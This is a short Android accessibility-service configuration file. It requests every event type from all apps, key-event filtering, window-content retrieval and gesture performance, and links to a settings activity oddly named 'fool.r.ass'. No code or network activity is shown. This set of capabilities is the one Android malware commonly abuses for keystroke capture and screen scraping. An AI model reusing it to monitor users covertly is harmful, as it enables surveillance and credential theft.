<?xml version="1.0" encoding="utf-8"?>

<accessibility-service xmlns:android="http://schemas.android.com/apk/res/android"
    android:packageNames=""
    android:accessibilityEventTypes="typeAllMask"
    android:accessibilityFlags="flagRequestFilterKeyEvents"
	android:description="@string/des"
    android:canRetrieveWindowContent="true"
    android:accessibilityFeedbackType="feedbackSpoken"
    android:notificationTimeout="100"
	android:canPerformGestures="true"
    android:canRequestFilterKeyEvents="true"
    android:settingsActivity="fool.r.ass"
/>
